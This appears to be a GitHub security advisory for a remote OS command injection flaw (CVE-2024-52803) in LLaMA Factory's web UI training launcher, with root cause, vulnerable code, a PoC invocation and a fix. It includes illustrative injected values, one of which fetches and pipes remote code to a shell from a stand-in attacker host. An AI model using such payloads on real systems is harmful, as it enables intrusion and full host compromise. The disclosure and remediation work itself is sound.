LLaMA Factory Remote OS Command Injection Vulnerability
Summary
A critical remote OS command injection vulnerability has been identified in the LLaMA Factory training process. It arises from improper handling of user input, allowing malicious actors to execute arbitrary OS commands on the host system. The issue is caused by insecure use of Popen with shell=True, coupled with unsanitized user input. Immediate remediation is required to mitigate the risk.
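For illustration only (the values and the echo command below are hypothetical, not LLaMA Factory code), this minimal sketch shows why interpolating user input into a shell=True command is dangerous: the shell treats the text after the ';' as a second, independent command.

from subprocess import Popen

user_value = "saves/run1; id"  # attacker-controlled input
# The shell runs `echo --output_dir saves/run1`, then runs `id` as a separate command.
Popen(f"echo --output_dir {user_value}", shell=True).wait()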
Affected Version
LLaMA Factory versions <= 0.9.0 are affected by this vulnerability.
Impact
Exploitation of this vulnerability allows attackers to:
- Execute arbitrary OS commands on the server.
- Potentially compromise sensitive data or escalate privileges.
- Deploy malware or create persistent backdoors in the system.
This significantly increases the risk of data breaches and operational disruption.
Root Cause
The vulnerability originates in the training process, where the output_dir value obtained from user input is injected into the Popen call without any sanitization. Furthermore, Popen is invoked in an unsafe way with shell=True, so the command string is interpreted by a shell, leading to a remote OS command injection vulnerability.
Vulnerable snippet:
# https://github.com/hiyouga/LLaMA-Factory/blob/bd639a137e6f46e1a0005cc91572f5f1ec894f74/src/llamafactory/webui/runner.py#L304-L323
def _launch(self, data: Dict["Component", Any], do_train: bool) -> Generator[Dict["Component", Any], None, None]:
    ...
    args = self._parse_train_args(data) if do_train else self._parse_eval_args(data)
    ...
    self.trainer = Popen(f"llamafactory-cli train {save_cmd(args)}", env=env, shell=True)
    yield from self.monitor()
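To make the injection concrete, here is a hedged sketch of what the launched command line can look like. The payload and the exact shape of the string returned by save_cmd are assumptions; the advisory only states that the user-supplied output_dir ends up in the Popen command unsanitized.

# Hypothetical attacker-supplied value; assumes save_cmd(args) embeds output_dir in its return value.
output_dir = "saves/run1; curl http://attacker.example/x | sh"
command = f"llamafactory-cli train --output_dir {output_dir}"
print(command)
# llamafactory-cli train --output_dir saves/run1; curl http://attacker.example/x | sh
# With shell=True, everything after the ';' executes as its own command on the host.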
Proof of Concept (PoC)
Steps to Reproduce
- Deploy LLaMA Factory.
- Execute the exploitation script from https://gist.github.com/superboy-zjc/f2d2b93ae511c445ba97e144b70e534d:
python3 llama-factory-rce.py --url http://127.0.0.1:7861 --cmd "curl XXX" --trace
An attacker can then execute any OS command they want on the host.
Remediation Recommendations
- Avoid using shell=True in Popen.
- Instead, pass the command and its arguments as a list. This prevents user input from being executed as part of a shell command.
cmd = [
    "llamafactory-cli",
    "train",
    *save_cmd(args).split(),
]
self.trainer = Popen(cmd, env=env)
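One caveat (an assumption, since the format of the string returned by save_cmd is not shown here): plain str.split() breaks quoted values that contain spaces, whereas shlex.split from the standard library tokenizes the string the way a shell would, without ever invoking one.

import shlex

raw = 'config.yaml --output_dir "my dir/run 1"'   # hypothetical save_cmd-style output
print(raw.split())       # ['config.yaml', '--output_dir', '"my', 'dir/run', '1"']  - quoted path is broken up
print(shlex.split(raw))  # ['config.yaml', '--output_dir', 'my dir/run 1']          - shell-style tokens, no shell run

If such values are possible, *shlex.split(save_cmd(args)) could be used in place of *save_cmd(args).split() in the fix above.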
Permalink: https://github.com/advisories/GHSA-hj3w-wrh4-44vp
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oajN3LXdyaDQtNDR2cM4ABBnB
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 1 month ago
Updated: about 1 month ago
CVSS Score: 7.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS Percentage: 0.00045
EPSS Percentile: 0.1735
Identifiers: GHSA-hj3w-wrh4-44vp, CVE-2024-52803
References:
- https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-hj3w-wrh4-44vp
- https://github.com/hiyouga/LLaMA-Factory/commit/b3aa80d54a67da45e9e237e349486fb9c162b2ac
- https://github.com/advisories/GHSA-hj3w-wrh4-44vp
Blast Radius: 1.0
Affected Packages
pypi:llamafactory
Dependent packages: 0
Dependent repositories: 0
Downloads: 2,381 last month
Affected Version Ranges: <= 0.9.0
Fixed in: 0.9.1
All affected versions: 0.7.1, 0.8.0, 0.8.1, 0.8.2, 0.8.3, 0.9.0
All unaffected versions: 0.9.1